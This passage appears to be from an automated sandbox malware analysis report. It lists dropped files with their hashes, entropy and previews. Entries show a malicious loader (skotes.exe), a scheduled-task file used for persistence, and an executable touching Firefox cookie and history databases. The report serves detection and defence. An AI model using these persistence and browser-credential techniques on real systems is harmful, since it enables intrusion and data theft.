                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymyttskr.01s.psm1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zbxwixso.5rr.ps1

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3220480
                                                                                                                                                                                                                                                    Entropy (8bit):6.6558508778698835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:InuGM5xECMK59cccgccctccOccccccccccYcccFCccccvcccyFcXccckc4cccccq:eM5xELKXcccgccctccOccccccccccYcS
                                                                                                                                                                                                                                                    MD5:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    SHA1:5A1993097306BF2AC08F4BC457DA97C797669989
                                                                                                                                                                                                                                                    SHA-256:7BD2D52A3DBD6ADFC7538319829BD471C1C9140709D8083A80A860EC2DEB93E1
                                                                                                                                                                                                                                                    SHA-512:A064F8E89FDEC590365B19B3265A69F2E764DAC4B3F1197A151F5BE9DC49E07A0AAD8F9ACACA3B2F2ACA7CAF403A744E46FEC84FE62E3D0FF99CE5DBC1D0CC3E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.....*"2...@.................................W...k...........................(.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ykgekexw.p*......f*.................@...prmmqeqz..... 1.......0.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2675
                                                                                                                                                                                                                                                    Entropy (8bit):3.978240424475412
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:85hd8TUtJHHfidAKZdA1nehwiZUklqehwy+3:85gcHLy
                                                                                                                                                                                                                                                    MD5:1A15192293B63287D5B92CAAEF2C1C86
                                                                                                                                                                                                                                                    SHA1:A7AB5740F6D0CC5B15E6EDC5DECFF6C3E3A44827
                                                                                                                                                                                                                                                    SHA-256:A3ED01719CD156D3019DDD7998806CB869511A63A1D107B48AA647A91C4BD3BE
                                                                                                                                                                                                                                                    SHA-512:6A85F8B27E8FFD21C75DD5ABF5D2989DEA51FFB638D82BF1BC097F98BB1D0A051C55180BED35D7F2A9281C92D7C6E2C90FCE10C84DED4D68F2D6A408DAA375F8
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....n..=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2677
                                                                                                                                                                                                                                                    Entropy (8bit):3.997478604916015
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8chd8TUtJHHfidAKZdA1geh/iZUkAQkqeh7y+2:8cgcj9Qey
                                                                                                                                                                                                                                                    MD5:D9A8CAD2B1409DC4A38A15DE8382C553
                                                                                                                                                                                                                                                    SHA1:39BE920BE01A3B67192D954A42DCA587DF1AFF2C
                                                                                                                                                                                                                                                    SHA-256:CB5A646F2B190DC9F5E44E871CE25260FDB31364DD8740D535E787638084A394
                                                                                                                                                                                                                                                    SHA-512:B06BE7A7122E98D8C074163CEEBF5C215144E331A0318A9394EFBCDFDAB1DE2EF058B63C33A8C8F5F53FDDF595C5C7114A0B65A3175517F291528FC8BEAC8CF5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....|.=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Oct 5 09:52:18 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2691
                                                                                                                                                                                                                                                    Entropy (8bit):4.004189851862961
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:87hd8TUtJCHfidAKZdA148eh7sFiZUkmgqeh7shy+BX:87gcinny
                                                                                                                                                                                                                                                    MD5:46689AEBB8DEBC656191A16A7A8E999E
                                                                                                                                                                                                                                                    SHA1:F07560354B4B5C6C6CA0E5C0EEB33161CEA5D769
                                                                                                                                                                                                                                                    SHA-256:35EB9F123F585BD88979C9B24F5CAEF6D0DAD5194F5F3A1EF3D52B73327C3296
                                                                                                                                                                                                                                                    SHA-512:29D6504766582A357E2EA3F44080E8F72FF53ED2FB604330927C4163D40D422FC97D02B3F36C3510BCECCE752A1A74DB83CE04C77846E957E2DD407D1A756782
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....s4..z.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VEW.V............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                    Entropy (8bit):3.9933375508340596
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8ihd8TUtJHHfidAKZdA1lehDiZUkwqeh/y+R:8igc+Zy
                                                                                                                                                                                                                                                    MD5:44574247629077EF3DFBD63A7278B50B
                                                                                                                                                                                                                                                    SHA1:BF672708E49F60112A454BECC487880A095E7218
                                                                                                                                                                                                                                                    SHA-256:43A1E5CC7096BA9E43151808D49BD9D487CB24AFA3B64E0AF766CD91F288C099
                                                                                                                                                                                                                                                    SHA-512:408C91C97E67FC87322C39936CDE6E118CFBBB92BCA5CF16A8C2C669A3EED20CA8388E58E4525DA0CCCAAF42F03C4F37B189216A7056997A8031B7BF24368E0E
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,....v.|=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2679
                                                                                                                                                                                                                                                    Entropy (8bit):3.982718430529963
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8nhd8TUtJHHfidAKZdA17ehBiZUk1W1qeh9y+C:8ngce9dy
                                                                                                                                                                                                                                                    MD5:32584F4FB55F817EF0E27A5014F91190
                                                                                                                                                                                                                                                    SHA1:7A9C2819AED2400D33B9C936A1E75BEF49C24F86
                                                                                                                                                                                                                                                    SHA-256:F79B238D426FD29AC262B62D25145678E2C6F347C9DC9451E8D23A9968296090
                                                                                                                                                                                                                                                    SHA-512:BE3F4BC7607BD8D673E3445BB392D6EC8637A0094E97B67E31A3FD8C0244590983B0DC59F52BB78ECB5FCE8B04AE5F25EB297FC445EFD6C305BDDA706CD24538
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,.....|.=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 13:42:39 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2681
                                                                                                                                                                                                                                                    Entropy (8bit):3.988594387957611
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:8dhd8TUtJHHfidAKZdA1duTiehOuTbbiZUk5OjqehOuTbny+yT+:8dgc+TLTbxWOvTbny7T
                                                                                                                                                                                                                                                    MD5:543F8231056D277D8779C6A1B794AE89
                                                                                                                                                                                                                                                    SHA1:FB9214CDB729C3AD5A00AE97438C1B78155CDFD1
                                                                                                                                                                                                                                                    SHA-256:DADC88C070B284591DB31F9111DC132C56186B4A65DC6EA3E7CB284039C7A899
                                                                                                                                                                                                                                                    SHA-512:BD69C43C42A6E516C13D852482CD3079B46BD0CC90AF50D08B2F970914BA4BAE552CC22718DFCA08824E9DDCE16B3CE40B631F4ACB3AB03CF611D7BC17DA7A8F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:L..................F.@.. ...$+.,......p=.[......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....EWXX..PROGRA~1..t......O.I.YRu....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.YRu....L.....................p+j.G.o.o.g.l.e.....T.1.....EW.V..Chrome..>......CW.V.YRu....M.....................g.u.C.h.r.o.m.e.....`.1.....EW.V..APPLIC~1..H......CW.V.YRu..........................g.u.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.YTu............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........m........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\cookies.sqlite-shm

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\bhsw2cld.default-release\places.sqlite-shm

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                                                                                                    Entropy (8bit):0.017262956703125623
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                                                                                                                                                    MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                                                                                                                                                    SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                                                                                                                                                    SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                                                                                                                                                    SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\Documents\HJEHIJEBKE.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3220480
                                                                                                                                                                                                                                                    Entropy (8bit):6.6558508778698835
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:98304:InuGM5xECMK59cccgccctccOccccccccccYcccFCccccvcccyFcXccckc4cccccq:eM5xELKXcccgccctccOccccccccccYcS
                                                                                                                                                                                                                                                    MD5:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    SHA1:5A1993097306BF2AC08F4BC457DA97C797669989
                                                                                                                                                                                                                                                    SHA-256:7BD2D52A3DBD6ADFC7538319829BD471C1C9140709D8083A80A860EC2DEB93E1
                                                                                                                                                                                                                                                    SHA-512:A064F8E89FDEC590365B19B3265A69F2E764DAC4B3F1197A151F5BE9DC49E07A0AAD8F9ACACA3B2F2ACA7CAF403A744E46FEC84FE62E3D0FF99CE5DBC1D0CC3E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.....*"2...@.................................W...k...........................(.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ykgekexw.p*......f*.................@...prmmqeqz..... 1.......0.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Windows\Tasks\skotes.job

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):284
                                                                                                                                                                                                                                                    Entropy (8bit):3.36310386342062
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:tVXflN0VzUEZ+lX1CGdKUe6tDsBZWVny0lbtSlEt0:tRfoQ1CGAFnv8VbUlEt0
                                                                                                                                                                                                                                                    MD5:7490B47151DF79EC36E50818C43C892D
                                                                                                                                                                                                                                                    SHA1:A087B40F12AD990E3879448A2E40534B1FE50EFF
                                                                                                                                                                                                                                                    SHA-256:A5144BA75F0F4D9B22A39660B4A602FC7704A329E8BDB97A8766BD8EF9CFB977
                                                                                                                                                                                                                                                    SHA-512:8AD1209C77D2948F8820E6621A8F037B28E3BC9622877EEDFB2660872744F03FF22979BF56A3B9465CC71282009E0148AE975729BA66F606F2DC1B3B2670E6CF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.....z.....L.t$.....F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.t.o.t.t.i.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........T.O.T.T.I.-.P.C.\.t.o.t.t.i...................0.................+.@3P.........................

                                                                                                                                                                                                                                                    C:\wOXcVegx\jyidkjkfhjawd.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027562001\cbfb8a9c89.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1282048
                                                                                                                                                                                                                                                    Entropy (8bit):7.989392691400588
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:tI05w/i0EgOp2bAntruwSB/n5FqAmHrnaNWQu2/O7pOuSLBLX:tI05w/i0Ed2buawK/qAmLGWx7pOLLBz
                                                                                                                                                                                                                                                    MD5:1B40450E11F71DA7D6F3D9C025C078E0
                                                                                                                                                                                                                                                    SHA1:5BDF461219E68AA7175A5FA01962AF8E3F583C7E
                                                                                                                                                                                                                                                    SHA-256:F7846A193C00E22D512FDC71FCA6FB3F3AF434179681D26700B11B7F4E69AB64
                                                                                                                                                                                                                                                    SHA-512:BFB8DFA87AAF0DC9AFD3AE19C6082A53917501899F582DDC10A56A311B9504A64F25C1B923ABE0B5077CEF64F6EF891089358D652E4A7618DACA9418BAD03017
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
